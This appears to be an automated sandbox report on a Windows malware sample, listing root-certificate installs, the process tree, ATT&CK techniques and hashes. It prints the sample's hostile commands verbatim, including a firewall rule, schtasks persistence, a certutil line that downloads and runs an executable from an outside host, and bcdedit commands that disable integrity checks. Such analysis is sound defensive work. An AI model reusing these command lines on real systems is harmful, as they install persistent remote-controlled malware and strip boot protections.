5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 csrss.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 csrss.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b80f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 csrss.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a441400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a319000000010000001000000014c3bd3549ee225aece13734ad8ca0b82000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 patch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 csrss.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 csrss.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 csrss.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1996 schtasks.exe 2684 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1464 JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe 3032 JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe 3032 JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe 3032 JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe 3032 JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe 3032 JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe 1636 csrss.exe 2984 injector.exe 2984 injector.exe 2984 injector.exe 2984 injector.exe 2984 injector.exe 2984 injector.exe 2984 injector.exe 2984 injector.exe 2984 injector.exe 2984 injector.exe 2984 injector.exe 2984 injector.exe 2984 injector.exe 2984 injector.exe 2984 injector.exe 2984 injector.exe 2984 injector.exe 2984 injector.exe 2984 injector.exe 2984 injector.exe 2984 injector.exe 2984 injector.exe 2984 injector.exe 2984 injector.exe 2984 injector.exe 2984 injector.exe 2984 injector.exe 2984 injector.exe 2984 injector.exe 2984 injector.exe 2984 injector.exe 2984 injector.exe 2984 injector.exe 2984 injector.exe 2984 injector.exe 2984 injector.exe 2984 injector.exe 2984 injector.exe 2984 injector.exe 2984 injector.exe 2984 injector.exe 2984 injector.exe 2984 injector.exe 2984 injector.exe 2984 injector.exe 2984 injector.exe 2984 injector.exe 2984 injector.exe 2984 injector.exe 2984 injector.exe 2984 injector.exe 2984 injector.exe 2984 injector.exe 2984 injector.exe 2984 injector.exe 2984 injector.exe 2984 injector.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 472 Process not Found -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 1464 JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe Token: SeImpersonatePrivilege 1464 JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe Token: SeSystemEnvironmentPrivilege 1636 csrss.exe -
Suspicious use of WriteProcessMemory 62 IoCs
description pid Process procid_target PID 3032 wrote to memory of 2996 3032 JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe 36 PID 3032 wrote to memory of 2996 3032 JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe 36 PID 3032 wrote to memory of 2996 3032 JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe 36 PID 3032 wrote to memory of 2996 3032 JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe 36 PID 2996 wrote to memory of 2720 2996 cmd.exe 38 PID 2996 wrote to memory of 2720 2996 cmd.exe 38 PID 2996 wrote to memory of 2720 2996 cmd.exe 38 PID 3032 wrote to memory of 1636 3032 JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe 39 PID 3032 wrote to memory of 1636 3032 JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe 39 PID 3032 wrote to memory of 1636 3032 JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe 39 PID 3032 wrote to memory of 1636 3032 JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe 39 PID 2176 wrote to memory of 1080 2176 patch.exe 47 PID 2176 wrote to memory of 1080 2176 patch.exe 47 PID 2176 wrote to memory of 1080 2176 patch.exe 47 PID 2176 wrote to memory of 340 2176 patch.exe 49 PID 2176 wrote to memory of 340 2176 patch.exe 49 PID 2176 wrote to memory of 340 2176 patch.exe 49 PID 2176 wrote to memory of 2384 2176 patch.exe 51 PID 2176 wrote to memory of 2384 2176 patch.exe 51 PID 2176 wrote to memory of 2384 2176 patch.exe 51 PID 2176 wrote to memory of 1528 2176 patch.exe 53 PID 2176 wrote to memory of 1528 2176 patch.exe 53 PID 2176 wrote to memory of 1528 2176 patch.exe 53 PID 2176 wrote to memory of 1160 2176 patch.exe 55 PID 2176 wrote to memory of 1160 2176 patch.exe 55 PID 2176 wrote to memory of 1160 2176 patch.exe 55 PID 2176 wrote to memory of 2100 2176 patch.exe 57 PID 2176 wrote to memory of 2100 2176 patch.exe 57 PID 2176 wrote to memory of 2100 2176 patch.exe 57 PID 2176 wrote to memory of 2432 2176 patch.exe 59 PID 2176 wrote to memory of 2432 2176 patch.exe 59 PID 2176 wrote to memory of 2432 2176 patch.exe 59 PID 2176 wrote to memory of 1868 2176 patch.exe 61 PID 2176 wrote to memory of 1868 2176 patch.exe 61 PID 2176 wrote to memory of 1868 2176 patch.exe 61 PID 2176 wrote to memory of 2344 2176 patch.exe 63 PID 2176 wrote to memory of 2344 2176 patch.exe 63 PID 2176 wrote to memory of 2344 2176 patch.exe 63 PID 2176 wrote to memory of 980 2176 patch.exe 65 PID 2176 wrote to memory of 980 2176 patch.exe 65 PID 2176 wrote to memory of 980 2176 patch.exe 65 PID 2176 wrote to memory of 1188 2176 patch.exe 67 PID 2176 wrote to memory of 1188 2176 patch.exe 67 PID 2176 wrote to memory of 1188 2176 patch.exe 67 PID 2176 wrote to memory of 1064 2176 patch.exe 69 PID 2176 wrote to memory of 1064 2176 patch.exe 69 PID 2176 wrote to memory of 1064 2176 patch.exe 69 PID 2176 wrote to memory of 2928 2176 patch.exe 71 PID 2176 wrote to memory of 2928 2176 patch.exe 71 PID 2176 wrote to memory of 2928 2176 patch.exe 71 PID 1636 wrote to memory of 1968 1636 csrss.exe 73 PID 1636 wrote to memory of 1968 1636 csrss.exe 73 PID 1636 wrote to memory of 1968 1636 csrss.exe 73 PID 1636 wrote to memory of 1968 1636 csrss.exe 73 PID 1636 wrote to memory of 1148 1636 csrss.exe 75 PID 1636 wrote to memory of 1148 1636 csrss.exe 75 PID 1636 wrote to memory of 1148 1636 csrss.exe 75 PID 1636 wrote to memory of 1148 1636 csrss.exe 75 PID 1636 wrote to memory of 2984 1636 csrss.exe 77 PID 1636 wrote to memory of 2984 1636 csrss.exe 77 PID 1636 wrote to memory of 2984 1636 csrss.exe 77 PID 1636 wrote to memory of 2984 1636 csrss.exe 77 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1464 -
C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_0eb79fdec3961a793b895f04eec1a2d2af347203bb90bcdc27e8e01c21405ef8.exe"2⤵
- Windows security bypass
- Loads dropped DLL
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3032 -
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"3⤵
- Suspicious use of WriteProcessMemory
PID:2996 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- Modifies data under HKEY_USERS
PID:2720
-
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe /188-1883⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Manipulates WinMon driver.
- Manipulates WinMonFS driver.
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1636 -
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F4⤵
- Scheduled Task/Job: Scheduled Task
PID:1996
-
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://spolaect.info/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F4⤵
- Scheduled Task/Job: Scheduled Task
PID:2684
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:2176 -
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER5⤵
- Modifies boot configuration data using bcdedit
PID:1080
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:5⤵
- Modifies boot configuration data using bcdedit
PID:340
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:5⤵
- Modifies boot configuration data using bcdedit
PID:2384
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows5⤵
- Modifies boot configuration data using bcdedit
PID:1528
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe5⤵
- Modifies boot configuration data using bcdedit
PID:1160
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe5⤵
- Modifies boot configuration data using bcdedit
PID:2100
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 05⤵
- Modifies boot configuration data using bcdedit
PID:2432
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn5⤵
- Modifies boot configuration data using bcdedit
PID:1868
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 15⤵
- Modifies boot configuration data using bcdedit
PID:2344
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}5⤵
- Modifies boot configuration data using bcdedit
PID:980
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast5⤵
- Modifies boot configuration data using bcdedit
PID:1188
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -timeout 05⤵
- Modifies boot configuration data using bcdedit
PID:1064
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}5⤵
- Modifies boot configuration data using bcdedit
PID:2928
-
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\Sysnative\bcdedit.exe /v4⤵
- Modifies boot configuration data using bcdedit
PID:1968
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exeC:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe4⤵
- Executes dropped EXE
PID:1148
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2984
-
-
-
-
C:\Windows\system32\makecab.exe"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20241222123328.log C:\Windows\Logs\CBS\CbsPersist_20241222123328.cab1⤵
- Drops file in Windows directory
PID:2832
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
4Disable or Modify System Firewall
1Disable or Modify Tools
2Modify Registry
4Subvert Trust Controls
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error
Filesize8.3MB
MD5fd2727132edd0b59fa33733daa11d9ef
SHA163e36198d90c4c2b9b09dd6786b82aba5f03d29a
SHA2563a72dbedc490773f90e241c8b3b839383a63ce36426a4f330a0f754b14b4d23e
SHA5123e251be7d0e8db92d50092a4c4be3c74f42f3d564c72981f43a8e0fe06427513bfa0f67821a61a503a4f85741f0b150280389f8f4b4f01cdfd98edce5af29e6e
-
C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error
Filesize492KB
MD5fafbf2197151d5ce947872a4b0bcbe16
SHA1a86eaa2dd9fc6d36fcfb41df7ead8d1166aea020
SHA256feb122b7916a1e62a7a6ae8d25ea48a2efc86f6e6384f5526e18ffbfc5f5ff71
